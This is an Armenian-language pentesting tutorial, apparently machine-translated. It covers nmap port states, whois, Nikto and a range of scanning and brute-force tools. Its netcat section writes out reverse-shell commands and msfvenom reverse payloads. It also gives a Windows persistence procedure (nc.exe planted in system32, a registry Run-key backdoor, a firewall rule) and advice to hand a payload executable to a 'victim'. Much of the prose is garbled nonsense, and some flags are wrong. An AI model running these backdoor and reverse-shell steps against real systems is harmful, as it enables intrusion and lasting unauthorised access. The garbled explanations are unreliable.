🛠️ ՑԱՆՑԱՅԻՆ ՍԿԱՆԱՎՈՐՄԱՆ ԳՈՐԾԻՔՆԵՐ
Ցանցի ամենահայտնի սկաներ։ Օգտագործվում է պորտերի, սերվերների, ծառայությունների և օպերացիոն համակարգերի հայտնաբերման համար։
Ցանցային «դանակ»: Օգտագործվում է կապի ստուգման, ֆայլ ուղարկելու, սերվեր լսելու նպատակով։
Վեբ սերվերի սկաներ, որը փնտրում է խոցելի կոնֆիգուրացիաներ։
Սահմանում է, թե որ տեխնոլոգիաներն են օգտագործվում կայքում (CMS, վեբ սերվեր և այլն)։
Նույնպես սահմանում է կայքի տեխնոլոգիաները (Node.js, Laravel, Apache և այլն)։
Փնտրում է կայքում թաքնված ֆայլեր և թղթապանակներ (admin panel, config files և այլն)։
gobuster dir -u https://site.com -w wordlist.txt
Շատ արագ պորտ սկաներ, նման Nmap-ին, բայց մեծ ցանցերի համար։
masscan -p1-65535 site.com --rate=1000
Սուբդոմեյնների հայտնաբերման գործիք։
Ինքնաշխատ SQL injection սկանավորման գործիք։
sqlmap -u "https://site.com?id=1" --dbs
Windows ցանցերի SMB ծառայությունների սկանավորում և ինֆորմացիայի հավաքում։
Brute-force հարձակումներ SSH, FTP, RDP, Telnet, և այլ ծառայությունների վրա։
hydra -l admin -P rockyou.txt ftp://site.com
📋 Օրինակ՝ Պարզ սկանավորման քայլեր
bashКопироватьРедактироватьnmap -sS -T4 -p- site.com # Պորտ սկանավորում nmap -sV -A site.com # Ծառայությունների և օպերացիոն համակարգի որոշում whatweb site.com # Տեխնոլոգիաների ճանաչում gobuster dir -u https://site.com -w common.txt # Թաքնված թղթապանակների փնտրտուք
Whois: Մենք փնտրում ենք կոնտակտային տվյալներ կայքի ստեղծողի մասին.
Այսօր մենք կխոսենք այն մասին, թե ինչպես կարելի է գտնել բոլոր կոնտակտային տվյալները կայքի ստեղծողի, բոլոր IP հասցեների, Geolecation- ի եւ այլնի մասին): Ես կցուցադրեմ որոշ ֆորումում: Կարող եք փնտրել կայքի մասին բոլոր տեղեկությունները ինչպես հեռախոսից, այնպես էլ համակարգչից: Եվ եկեք իջնենք)
Ինչ է Whosi-ը?
Whois (անգլերենից: Ով է, «Ով է դա»: - Կիրառական մակարդակի ցանցային արձանագրություն `ելնելով TCP արձանագրության (Port43): Հիմնական դիմումը տիրույթի անունների, IP հասցեների եւ ինքնավար համակարգերի սեփականատերերի վերաբերյալ գրանցման տվյալների ստացումն է.
Արձանագրությունը ենթադրում է հաճախորդ-սերվերի ճարտարապետություն եւ օգտագործվում է IP հասցեների գրանցամատյանների եւ դոմենային անունների գրանցամատյանների եւ գրանցամատյանների հաշվառման պետական տվյալների բազայի սերվերներ (տվյալների շտեմարան): Սույն Արձանագրության ներկայիս վարկածը նկարագրված է RFC 3912- ում: Ամենից հաճախ Whois-Blade- կարգավորումը վահանակների ծրագրերի տեսքով: Այնուամենայնիվ, քանի որ շատ օգտվողների համար թիմը զարմանալի է կամ անհարմար է, վեբ ձեւերը սովորաբար ստեղծվում են վահանակների հաճախորդների հիման վրա, որոնք հասանելի են ինտերնետում օգտագործողներին: Բացի այդ, կան գրաֆիկական ինտերֆեյսով հաճախորդներ.
Եւ ինչպես որոնել տեղեկատվություն?
Հեշտ) Արարչի մասին տեղեկատվություն գտնելու շատ կայքեր կան, ես ձեզ ցույց կտամ այն կայքերը, որոնք ես օգտագործում եմ:)
Առաջին կայքը.
http://whois.domaintools.com Ահա կայքի սեփականատիրոջ մասին տեղեկատվություն հավաքելու կայք: Ինչպես աշխատել դրանում Հարցրեք ձեզ: Ես հիմա կբացատրեմ.
Այնտեղ մուտքագրեք կայքի անվանումը կամ IP հասցեն: Ես ցույց կտամ vk.com- ի օրինակով
Քշեք այնտեղ ցանկացած կայք, ապա նկարեք ստուգում, որը դուք ռոբոտ չեք եւ տալիս է ձեզ նման:
Այս ամենը չէ, մենք շարժվում ենք)
Ես ցույց տվեցի VK- ի օրինակը, բայց դուք կարող եք փնտրել որեւէ այլ)
Ինչ անել, եթե տեղեկատվությունը չի հայտնվել?
Եթե չկա ինֆորացիա, ապա կա պաշտպանություն Whois- ի դեմ, բայց հազվադեպ է, թե ով է այն ունի))
Nmap
Այսօր մենք կքննարկենք Պենտեստերի ամենատարածված գործիքներից մեկը `NMAP - Cult Cross-Sprolform Scanner, որը քայքայում է որպես« ցանցային Mapper».
Գործիքը ինքնին բավականին հզոր է, բայց այն առավել հաճախ օգտագործվում է այլ կոմունալ ծառայությունների հետ միասին, չշտպելով, որ բացի ցանցը սկանավորելու ունակությունից, NMAP- ն ունի շատ այլ հնարավորություններ.
Չնայած NMAP- ը անընդհատ ավելացրեց ֆունկցիոնալությունը, կոմունալ ծրագիրը ի սկզբանե մշակվել է որպես արդյունավետ նավահանգստի սկաներ, եւ այն դեռ պահպանում է իր հիմնական գործառույթները: Պարզ NMAP <Scan- ի նպատակային թիմը սկանավորելու է ավելի քան 1660 TCP նավահանգիստ <թիրախային մեքենայի վրա>: Թեեւ շատ նավահանգիստների սկաներներ ավանդաբար բոլոր նավահանգիստները բաժանում են փակ եւ բաց, NMAP- ն ավելի մանրամասն բաժանման մասշտաբ ունի: Նա նավահանգիստները բաժանում է վեց պետություն. Բաց, փակ, զտված, ոչ զտիչ, բաց | զտված կամ փակ | ֆիլտրացված.
Այս պետությունները իրականում ոչ թե նավահանգիստների բնութագրերը չեն, այլ միայն նկարագրում են, թե ինչպես է դրանք տեսնում NMAP- ը: Օրինակ, նույն ցանցից սկանավորելը, քանի որ նպատակը կարող է ցույց տալ, որ Port 135 / TCP- ը բաց է, միեւնույն ժամանակ ինտերնետից սկանավորում է, եւ նույն տարբերակներով կարող է ցուցադրել, որ նավահանգիստը կարող է ցուցադրել.
NMAP- ը նավահանգստի սկաներների եւ ամենակարեւոր պենտեստերի գործիքներից մեկն է.
Եկեք սկսենք
Պահանջ
Նավահանգիստների նահանգները իրենց հիմնական հատկությունները չեն. Նա ցույց է տալիս, թե ինչպես է դրանք տեսնում NMAP- ը: NMAP նավահանգիստը բաժանված է վեց պետությունների:
- Բաց անել: Այս պայմանը նշանակում է, որ թիրախային մեքենայի վրա հայտը լսում է այս նավահանգստի միացումներ / պայուսակներ.
- Փակ: Այս պայմանը նշանակում է, որ նավահանգիստների վրա դիմումներ չկան, որոնք լսում են նրանց, չնայած նրանք կարող են ցանկացած պահի բացել.
- Ֆիլտրացված: Այս պայմանը նշանակում է, որ Firewall- ը, ֆիլտրը կամ ցանցի այլ խոչընդոտը արգելափակում են նավահանգիստը, ուստի NMAP- ը չի կարող որոշել, թե դա բաց է, թե փակ է.
- Առանց զտելու: Նավահանգիստները դասակարգվում են որպես չկարգավորված, եթե նրանք պատասխանում են NMAP խնդրանքներին, բայց NMAP- ը չի կարող որոշել, թե դրանք բաց են, թե փակ են.
- Բաց / զտված: ցույց է տալիս, որ նավահանգիստը զտվել կամ բացվել է, բայց NMAP- ը չկարողացավ ստեղծել վիճակը.
- Փակ / ֆիլտրացված : ցույց է տալիս, որ նավահանգիստը զտվել կամ փակվել է, բայց NMAP- ը չկարողացավ ստեղծել վիճակը.
Բաց Port
Այս դեպքում նավահանգստում գործող ծառայությունը կամ դիմումը ակտիվորեն ընդունում են TCP, UDP կապերը: TCP փաթեթներ ենք ուղարկում թիրախային մեքենայի 80-րդ նավահանգիստ: Մենք գտնում ենք, որ նավահանգիստը բաց է.
nmap -p80 192.168.1.119
Մենք նայում ենք Wirehark- ին եւ գտնում ենք, որ կա եռակողմ ձեռքի ցնցում, ինչպես ցույց է տրված ստորեւ.
- NMAP- ը կսահմանված փաթեթ է ուղարկում նավահանգիստին 80
- NMAP- ը ստացել է Syne փաթեթ, ACK- ը որպես պատասխան 80-ից, ինչը նշանակում է, որ 80-ը բաց է.
- NMAP- ը փաթեթ է ուղարկում RST
Փակ Port
Այս դեպքում նավահանգստի ծառայությունը կամ կիրառումը հասանելի է, բայց դրա վրա որեւէ դիմում չի ներկայացվել: Երբ նավահանգիստը փակ է, նա RST- ն ուղարկում է ACK փաթեթով, երբ ստանում է TCP Syn փաթեթ.
nmap -p80 192.168.1.119
Այժմ մենք օգտագործեցինք Syn Scan- ը TCP- ի Syn- ի փաթեթները ուղարկելու թիրախային մեքենայի 80 նավահանգիստ եւ գտավ, որ նպատակը Փակ . Դա այն է, որ հենց որ նա ստանա TCP Syn փաթեթ, նա հետ է ուղարկում TCP RST, ACK փաթեթը.
Մենք կստուգենք Wiireark- ը `լրացուցիչ տեղեկատվություն գտնելու համար, ինչպես եւ սպասվում էր, որ թիրախային մեքենան ստացավ TCP Syn փաթեթը, այն պատասխանեց TCP- ի RST- ին, իսկ NMAP- ը մեկնաբանեց այն որպես փակ նավահանգիստ.
- NMAP- ը կսահմանված փաթեթ է ուղարկում նավահանգիստին 80
- NMAP- ը ստացել է RST, ACK փաթեթ, որպես պատասխան 80-ից, ինչը նշանակում է, որ 80-ը փակված է.
Զտիչ պորտ (filter)
Այս դեպքում NMAP- ը չի կարող որոշել, նավահանգիստը բաց է, քանի որ փաթեթների ֆիլտրումը թույլ չի տալիս փաթեթներ հասնել նավահանգիստ: Երբ փաթեթը ետ է նետվում, NMAP- ը մի քանի անգամ կրկնում է փորձը, եթե զննարկումը հետաքննության արդյունքում նետվի, եւ ոչ թե զտման պատճառով: Այն կտրուկ դանդաղեցնում է սկան.
Եկեք օգտվենք iptables- ից `TCP փաթեթները թիրախային մեքենայի վրա հանելու համար.
iptables -I INPUT -p tcp -j DROP
Այժմ, երբ մենք սկանավորում ենք թիրախային մեքենան, փաթեթները կվերադառնան հենց այն, երբ այն ստանում է TCP փաթեթներ.
nmap -p80 192.168.1.119
Ստորեւ ներկայացված պատկերից կարող եք տեսնել, որ այժմ այն ցույց է տալիս նավահանգստի համար «զտված» վիճակը 80.
Եկեք նայենք Wirehark- ին եւ գտնենք, որ երբ NMAP- ը ուղարկում է TCP Syn փաթեթ, մենք թիրախային մեքենայից պատասխան չենք ստանում: Սա նշանակում է, որ փաթեթային ֆիլտրը կամ Firewall- ը ձուլում են մեր փաթեթները.
Չզտիչ պորտ (filter)
Անթափանց վիճակը նշանակում է, որ նավահանգիստը մատչելի է, բայց NMAP- ը չի կարող որոշել, թե դա բաց է, թե փակ: Միայն ACK սկան, որն օգտագործվում է BrandMauer- ի կանոնների հավաքածուները համեմատելու համար, դասակարգում է նավահանգիստները այս վիճակում: Սկանավորում է սկանավորման այլ տեսակներ, ինչպիսիք են պատուհանի սկանավորման այլ տեսակներ, ինչպիսիք են պատուհանի սկանավորումը կամ Fin Scanning- ը, կարող են օգնել որոշել, թե նավահանգիստը բաց է.
Մենք օգտագործում ենք iPTables- ը `TCP- ի ցանկացած փաթեթը, որը մուտք է գործում 80-ը նպատակային մեքենայի վրա.
iptables -I INPUT -p tcp – dport = 80 -j DROP
Հիմա մենք օգտագործում ենք NMAP ACK սկան Թիրախային մեքենան սկանելու համար, ստուգելու համար, կա firewall, թե ոչ.
nmap –sA -p22,80 192.168.1.119
Ինչպես երեւում է ստորեւ ներկայացված պատկերում, առանց Firewall- ի նավահանգիստը ցուցադրվում է որպես ոչ-լեզվով, քանի որ NMAP- ը չի կարող որոշել, թե դա բաց է, թե փակ է.
Մենք Wirehark- ում կարող ենք տեսնել, որ դրա համար պորտ 22 Մենք ստանում ենք Փաթեթավորել, Մինչ նավահանգստի դեպքում 80-ը փաթեթը հանվում է թիրախային մեքենայի կողմից.
Բաց | Զտիչ պորտ (filter)
Այս դեպքում NMAP- ը չի կարող որոշել, նավահանգիստը բաց է կամ զտված: Դա տեղի է ունենում սկանավորման տեսակների համար, որոնցում բաց նավահանգիստները չեն պատասխանում: Պատասխանի բացակայությունը կարող է նաեւ նշանակել, որ փաթեթային ֆիլտրը նետեց զոնդը կամ դրա հետեւանքով առաջացած ցանկացած պատասխան: Այսպիսով, NMAP- ը հաստատ չգիտի, նավահանգիստը բաց է կամ զտված: UDP, IP արձանագրություն, Fin, Null եւ Xmas- ը թույլ է տալիս այս կերպ դասակարգել նավահանգիստները.
Եկեք օգտագործենք NMAP XMAS սկան `թիրախային մեքենա սկանավորելու համար.
nmap -sX -p80 192.168.1.119
Ինչպես տեսնում ենք, NMAP Scan- ը մեզ ցույց է տալիս նավահանգիստ, որը պետք է լինի բաց | ֆիլտրացված.
Մենք ստուգելու ենք Cireshark- ը NMAP- ի կողմից ուղարկված փաթեթները վերլուծելու եւ տեսեք, որ մենք պատասխան չենք ստանում, նույնիսկ եթե նավահանգիստը բաց է.
Փակ | Զտիչ պորտ (filter)
Այս պայմանը օգտագործվում է, երբ NMAP- ը չի կարող որոշել, նավահանգիստը փակ է կամ զտված: Այն օգտագործվում է միայն դրա համար սկանավորում IP նույնացուցիչ .
Մենք օգտագործում ենք iptables մեր նպատակային մեքենայի վրա `թիրախային մեքենայի մուտքային TCP փաթեթները մերժելու համար.
iptables -I INPUT -p tcp -j DROP
Մենք սկանելու ենք IP ID- ն թիրախային մեքենայում, օգտագործելով 192.168.1.107 որպես մեր զոմբի.
nmap -p80 -sI 192.168.1.107 192.168.1.119
Ինչպես տեսնում ենք, Zombie սպասման ռեժիմում սկանավորելիս դա ցույց է տալիս փակված վիճակը | Զտեք նավահանգստի համար 80.
Սպասման ռեժիմում սկանավորումը բաղկացած է երեք քայլից, որոնք կրկնվում են յուրաքանչյուր նավահանգստի համար:
- Ստուգեք Zombie IP նույնացուցիչը եւ գրեք այն ներքեւ.
- Ստեղծեք zombie Syne փաթեթ եւ ուղարկեք այն թիրախների աջ պորտ: Կախված նավահանգստի վիճակից, թիրախային արձագանքը կարող է հանգեցնել կամ չի հանգեցնի զոմբիի IP նույնականացման աճի.
- Նորից ստուգեք IP ID Zombies- ը: Այնուհետեւ թիրախային նավահանգստի վիճակը որոշվում է `համեմատելով այս նոր IP նույնականացումը քայլում գրանցված նույնացուցիչի հետ 1.
Մենք ստուգում ենք Cireshark- ը եւ գտնում ենք, որ գտել ենք ամբողջ գործընթացը.
Netcat է Pentest- ի համար
Այս հոդվածը բացառապես բնույթով կրթական է: Հեղինակը պատասխանատու չէ նրա ընթերցանության հետեւանքների համար.
Այսօր այս հոդվածում մենք կքննարկենք ամենատարածված ցանցային կոմունալ ծառայություններիերից մեկը եւ պարզենք, թե ինչպես են օգտագործում այլ շրջանակներ Նմուշ Նիստ ստեղծելու համար.
Մայրցամաք
- Ներածություն
- NetCat Հիմնական հրամաններ
- Նավահանգստի սկանավորում (TCP սկանավորում))
- Նավահանգստի սկանավորում (UDP սկանավորում))
- Զրուցել
- Banner Capture
- Ֆայլի փոխանցում
- Linux- ի հակադարձ կապ
- Պատահական պորտ
- Ձեռք բերեք http banner
- Հակադարձ կապի պատուհաններ
- Համախմբում Windows համակարգում 10
- Բարեւ բեռնեք MSFVENOM- ը Netcat- ի հետ
Ներածություն
Netcat (NCAT, NC), տեխնիկապես օգտագործվում է որպես «տոհմ» — Սա բազմաֆունկցիոնալ ցանցային գործիք է, որը կարդում եւ ձայնագրում է տվյալները հրամանի տողից: NCAT- ը գրվել է NMAP նախագծի համար, որպես NetCat- ի հարգելի ծրագրի մեծ բարելավված վերամարմնավորում: Այն օգտագործում է TCP եւ UDP հաղորդակցման համար եւ ստեղծվել է հուսալի շարժիչ, ցանցը միանգամից այլ ծրագրեր եւ օգտվողներ: NCAT- ը ոչ միայն աշխատում է IPv4- ի եւ IPV6- ի հետ, այլեւ օգտագործողին հնարավորություն է տալիս օգտագործման հնարավոր անսահմանափակ ընտրանքներ.
NCAT- ի մեծ թվով գործառույթների շարքում հնարավոր է կառուցել շղթաներ `NCAT- ից եւ UDP նավահանգիստներին ուղղորդելով այլ կայքեր, աջակցություն SSL- ին, աջակցելով վստահված անձի միջոցով (նաեւ կամայական վավերացման հնարավորությամբ): Որոշ ընդհանուր սկզբունքներ կիրառվում են դիմումների մեծ մասի վրա եւ, հետեւաբար, հնարավորություն տվեք ձեզ հնարավորություն տալ ցանցի աջակցություն ավելացնել ծրագրակազմին, որը սովորաբար երբեք չի պաշտպանում.
Փորձենք ավելի խորը փորել եւ պարզել, թե ինչ կարող է անել այս հիանալի գործիքի միջոցով.
«Օգնական» կամ «ժիր» - Այս դրոշը օգտագործվում է գործիքի բոլոր հնարավորությունները ցուցադրելու համար: NetCat- ի հետ սկսելու համար մենք կօգտագործենք վկայագրի ամենապարզ հրամանը, մասնավորապես:
nc -h
Նավահանգստի սկանավորում
NetCat- ը կարող է օգտագործվել որպես նավահանգստի սկաներ, չնայած նախատեսված չէ աշխատել այս կարողությամբ: Դրոշն օգտագործվում է իր օգնությամբ սկանավորելու համար «-Հետ». Սա թույլ է տալիս հասկանալ, թե ինչ տեսակի ծառայություններ են աշխատում այս հատուկ նավահանգստում: Այսպիսով, Netcat- ը կարող է սկանավորել TCP- ն եւ UDP- ն, եկեք տեսնենք, թե ինչպես դա անել:
nc -v –n –z 192.168.60.133 21-100
[-ն]: IP հասցեներ, որոնք բաղկացած են միայն թվերից, առանց DNS- ի.
[-Հետ]: ցույց է տալիս զրոյական մուտքի / ելքային ռեժիմը (օգտագործվում է սկանավորման համար))
Այս սկանն ավարտելու համար մեզ անհրաժեշտ է Նշեք նավահանգստի տեսականին. Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ ես նշեցի նավահանգստի տեսականին 21–100.
Մենք նույնիսկ կարող ենք սկանավորել UDP- ի նավահանգիստները այնպես, ինչպես սկանանում են TCP նավահանգիստները: Այստեղ մենք կօգտագործենք դրոշը «–մեջ», որը կհանգեցնի UDP ռեժիմի.
nc –vzu 192.168.60.133 68
Այս սցենարում մենք նշեցինք նավահանգստի համարը, ոչ թե միջակայքը: Ստորեւ նկարում կարող եք տեսնել, որ մենք առգրավել ենք աշխատանքային ծառայությունը «կոշիկ» .
Զրուցել
NetCat- ը կարող է օգտագործվել նաեւ երկու օգտագործողի հաղորդակցման համար: Բայց մինչ այդ մենք պետք է կապ հաստատենք: Այս ամենը կազմաձեւելու համար մենք կօգտագործենք երկու սարք, մեկը դեր կխաղա Կապի նախաձեռնողը, Եւ մեկ այլ - ունկնդիր . Հենց այս բարդույթը հաստատվի, կապը կարող է իրականացվել երկու ծայրերից.
Եկեք ստուգենք այս սցենարը, որտեղ տարբեր գործառնական համակարգ ունեցող երկու օգտվողներ միմյանց հետ շփվում են NetCat- ի տեղադրված կապի միջոցով.
Ի սկզբանե Օգտագործողի արմատային համակարգիչ Դուք պետք է կազմաձեւեք ձեր սեփականը «Ունկնդիր» Net անցային կապը ստեղծելու համար NetCat- ը հատուկ նավահանգստի միջոցով: Դա անելու համար հետեւեք հաջորդ հրամանին:
nc –lvp 1234
Հիմա ժամանակն է կարգավորել երկրորդ մեքենան, որը միանալու է առաջինին, մենք դա կանենք Օգտագործողի DVWA, Պարզապես տրամադրելով այն համակարգի IP հասցեն, որում մենք մեկնարկել ենք Ունկնդիր, եւ ապա նավահանգստի համարը.
nc 192.168.60.130 1234
Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ կապը կազմաձեւված է, Եվ հիմա երկու մեքենան կարող է կապվել միմյանց հետ.
Banner Capture
Բանավառը հյուրընկալողից ստացված տեքստային հաղորդագրություն է, տեղեկատվություն ունենալով բաց նավահանգիստների եւ ծառայությունների մասին, ինչպես նաեւ դրանց վարկածի համարների մասին.
Հետեւեք հաջորդ հրամանին, նպատակաուղղված լինելու համար FTP պաստառներ Մի քանազոր սսի :
nc 192.168.60.133 21 nc 192.168.60.133 22
Ֆայլի փոխանցում
NetCat- ը մեզ հնարավորություն է տալիս ֆայլերը մեկ սարքից մյուսը փոխանցել ցանցի միջոցով.
Եկեք շարունակենք սցենարը, որում Օգտագործողի արմատային համակարգիչ Ֆայլը ներկայացնել օգտագործողին DVWA CAR.
Նախորդ պատկերից, օգտագործողը ROOT PC CAR Տեղադրում Ունկնդիր նավահանգստի քանակի վրա 5555 եւ բաժանված է File.txt- ի միջոցով `օգտագործելով պարամետրը «<» .
nc –lvp 5555 < file.txt
Այժմ օգտագործողը նստած է մեքենայով dvwa, Վերբեռնեք այս ֆայլը `լրացնելով հետեւյալ հրամանը.
nc 192.168.60.130 5555 > file.txt
Ստորեւ նկարից դուք կարող եք դա տեսնել Օգտագործողի DVWA Հաջողությամբ ստացել է ֆայլ file.txt դեպի 192.168.60.130, ինչը ոչ այլ ինչ է, քան Օգտագործողի արմատային համակարգչի IP հասցեն.
Linux- ի հակադարձ կապ
Ինչպես ավելի վաղ քննարկվեց, Netcat- ը կարող է որեւէ բան անել, այնպես որ հիմա կփորձենք «Մսեղեն» Ստեղծեք օգտակար բեռ եւ Տեղադրեք LIST- ը NETCAT- ին Նիստը գրավելու համար.
Եկեք փորձենք ստեղծել օգտակար բեռ `օգտագործելով հաջորդ հրամանը:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.60.130 lport=6666 R
«Ժլատ» Վերջում այն օգտագործվում է տեքստի բեռ հիմնելու համար, որը կցուցադրվի էկրանին.
Վերոնշյալ պատկերից կարող եք տեսնել, որ մեր ծանրաբեռնվածությունը պատրաստ է, այժմ ժամանակն է այն գործարկել մեր զոհի սերվերի միջոցով.
Բացեք մեքենան dvwa եւ մուտքագրեք այս օգտակար բեռը տերմինալում. Սկսելուց առաջ Վերադարձեք հարձակվողի մեքենային (համակարգիչ) Եւ տեղադրված այնտեղ NETCAT աուդիտոր, Օգտագործելով նույն նավահանգստի համարը, որը դուք օգտագործում եք բեռի բեռնում.
Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ տուժածը սկսում է օգտակար բեռ, մենք կստանանք նիստ.
Տուժողի կողմից հակառակ կապը հակադարձ կապ ունենալու եւս մեկ հանրաճանաչ միջոց է հրամանի կատարումը իր մեքենայի վրա:
nc -e /bin/sh 192.168.60.133 1234
Հաճախ պատահում է, որ մենք չենք կարող գրավել այս մեթոդների օգնությամբ նիստը, որոշ պաշտպանության միջոցների պատճառով, բայց հակառակ կապ ստանալու եւս մեկ տարբերակ կա.
Տեղադրեք դրանից առաջ Ունկնդիր Netcat նավահանգստի վրա 443 :
Երբ ունկնդիրը սկսվում է, պարզապես հետեւեք հետեւյալ հրամաններին տուժած մեքենայի կողմից:
mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc 192.168.60.130 443 1>/tmp/backpipe
Սա կօգնի ձեզ շրջանցել անվտանգության մեխանիզմը եւ ստանալ NetCat նիստ.
Ստորեւ նկարում կարող եք տեսնել, որ մենք հաջողությամբ ստացել ենք տուժողի կեղեւը.
Պատահական պորտ
Դա պատահում է, որ մենք չենք կարող ընտրել մեր սեփական նավահանգիստը `լսելու ունկնդիրը կազմաձեւելու կամ NetCat կապ հաստատելու համար: Դրա համար Netcat- ը ունի հատուկ դրոշ «–Ժլատ», որը մեզ կտրամադրի պատահական տեղական նավահանգիստ.
nc -lv –r
Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ մեր ունկնդիրն է գործարկվում 35799.
Ձեռք բերեք http banner
HTTP պաստառները կարող են պարունակել սերվերի մասին տեղեկատվություն: Մենք կարող ենք օգտագործել NetCat- ը `ցանկացած վեբ սերվերի մասին տեղեկատվություն հավաքելու համար.
Պարզապես գործարկեք հաջորդ հրամանը
printf "GET / HTTP/1.0\r\n\r\n" | nc 192.168.60.133 80
Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ ես հաջողությամբ գրավել եմ http banner- ը, եւ մենք ներկայացված ենք Apache սերվեր.
Հակադարձ կապի պատուհաններ
NetCat- ը նմանապես կարող է օգտագործվել Windows համակարգում.
Եկեք նախ կազմաձեւենք ունկնդիր Մեր մեքենայի վրա համակարգիչ:
nc –lvp 4444
Այժմ հետեւեք հաջորդ հրամանը Windows հրամանի տող Հակառակ կապ ստեղծելու զոհ.
nc.exe 192.168.177.3 4444 -e cmd.exe
Ժամանակն է վերադառնալ Հարձակվող մեքենան . Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ մենք գտնվում ենք տուժողի հրամանատարության մեմբրանում.
Համախմբում համակարգում Պատուհաններ 10
Համակարգում համախմբումը կարեւոր դեր է խաղում հարձակվողի համար: Եկեք փորձենք ստեղծել Մշտապես մատչելի հովանավոր հյուրընկալող մեքենայի վրա օգտագործելով NetCat եւ Metasploit Framework- ը, որը մենք կոտրվել ենք.
Ստորեւ նկարում կարող եք տեսնել, որ ես Ստացել է մետրոյի նստաշրջան մի կողմ ավտոմեքենա Հետ Պատուհաններ 10.
Այժմ բեռնեք ֆայլը netcat.exe Վիճակ համակարգ32 Տուժողի համակարգչում, օգտագործելով հաջորդ հրամանը:
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
Այժմ տեղադրեք Netcat- ը լսում Օրինակ, ցանկացած պատահական նավահանգիստ - 4445, Մենք գրանցում ենք գրում համակարգը սկսելիս նավահանգստի բացումը եւ կապը սահմանել.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
Netcat- ի հետ հաջող կապով, մենք ստանում ենք հակադարձ կեղեւ PC համակարգչից.
Հիմա ժամանակն է անունով նոր կանոն ավելացնել firewall- ով «Նմուշ», որում Մուտքային կապ միջով պորտ 4445
Մետրերից սկսելու համար մենք գնում ենք Windows Terminal, օգտագործելով հրաման:
shell
Եվ դրա մեջ մենք մտնում ենք հաջորդ թիմ:
netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
Կարող եք ստուգել ռեժիմը եւ նավահանգստի վիճակը `լրացնելով հետեւյալ հրամանը:
netsh firewall show portopening
Այսպիսով, այս ամենով մենք ավարտեցինք: Հիմա, երբ տուժողը նորից է Վերագործարկեք համակարգը, Մենք հնարավորություն կստանանք միանալու դրան: Մենք կատարում ենք հաջորդ հրամանը միանալու համար Նմուշ նավահանգստի միջոցով 4445 .
nc -nv 192.168.177.2 4445
Մենք հաջողությամբ ստեղծեցինք Մշտական հենակետ! Հիմա, երբ տուժողը բեռնվում է, մենք միշտ կունենանք նրա նիստը.
Բարեւ բեռնեք MSFVENOM- ը Netcat- ի հետ
Եկեք պարզենք, թե ինչպես կարող ենք զոհին միանալ մեր NetCat- ի միջոցով `օգտագործելով MSFVEVEM- ի օգտակար բեռը.
Գործարկել տերմինալը եւ լրացրեք հաջորդ հրամանը `օգտակար բեռ ստեղծելու համար .արտակարգ
msfvenom -p windows/shell_reverse_tcp lhost=192.168.177.3 lport=3333 –f exe > shell.exe
Հիմա միացրեք Netcat- ը գաղտնալսման համար պորտ 3333.
Կիսվեք այս առաջացած ծանրաբեռնված ծանրաբեռնվածությամբ տուժողի հետ, հենց որ նա բացում է, դուք կստանաք Հակադարձ կապ.
Nikto
Մենք ստուգում ենք խոցելիության համար ցանկացած կայք, օգտագործելով Nikto
Պատահական որեւէ կայքի վրա հարձակվելուց առաջ հակեր կամ պենտեստեր առաջինը կազմում է նպատակների ցուցակը: Այն բանից հետո, երբ նա լավ է ծախսում Խելք Եվ նա կգտնի թույլ տեղեր «տեսողությունը առաջնորդելու» համար, նրան անհրաժեշտ կլինի վեբ սերվերի սկանավորման գործիք, ինչպիսին է Նիկտոն, որը կօգնի գտնել խոցելի հարձակման վեկտորներ.
Nikto- ն վեբ սերվերների պարզ բաց սկաներ է, որը ստուգում է կայքը եւ հայտնում է այն խոցելիությունը, որոնք կարող են օգտագործվել շահագործման կամ հակերության համար: Բացի այդ, սա ամենատարածված կայքերի ամենատարածված կայքերի սկանավորման գործիքներից մեկն է ամբողջ արդյունաբերության մեջ խոցելիության համար, եւ շատ շրջանակներում այն համարվում է արդյունաբերության չափանիշ.
Չնայած այն հանգամանքին, որ այս գործիքը չափազանց արդյունավետ է, այն գաղտնի չի գործում: Ներխուժման հայտնաբերման համակարգի կամ անվտանգության այլ միջոցառումների ցանկացած կայք կհասկանա, որ սկանավորված է: Նիկոն մշակվել է անվտանգության ստուգման եւ աշխատանքի գաղտնիության մասին, ոչ ոք չի մտածել.
Ինչպես ճիշտ օգտագործել Nikto- ն
Եթե դուք պարզապես նիկտո գործեք թիրախային կայքում, գուցե չհասկանաք, թե ինչ անել սկանավորումից հետո ստացված տեղեկատվության հետ: Նիկոն իրականում ավելի շատ նման է լազերային ցուցիչի, որը ենթադրում է կրակոց, իսկ որոշ ժամանակ անց կտեսնեք, թե ինչպես է այն գործում.
Նախ խոսենք նպատակների մասին (թիրախ): Նպատակը կարող է լինել գրեթե ցանկացած վայր, որտեղ հաքերը կարող է հարվածել հակերներին, օրինակ, ցանցային տպիչներ կամ վեբ սերվեր: Երբ մենք մի փոքր անց ենք գնում Նիկոյի օգտագործումը, մենք պետք է նրան տրամադրենք տեղեկատվության երեք տեսակներից մեկը. IP հասցեն տեղական ծառայության համար, վեբ տիրույթ հարձակման կամ կայքի SSL / HTTPS.
Նախքան Nikto- ի միջոցով սկան սկսելը, ավելի լավ է նախապես վերականգնել հետախուզումը, օգտագործելով նման բաց գործիք, ինչպես Մալտեգո. Նման գործիքները կարող են օգտակար լինել պրոֆիլ ստեղծելիս եւ նպատակների ավելի կոնկրետ ցուցակի ձեւավորումը, որի վրա պետք է կենտրոնանաք: Հենց դա անեք, հնարավոր կլինի օգտագործել NIKTO- ն `ձեր ցուցակից նպատակներով հնարավոր խոցելիության որոնման համար.
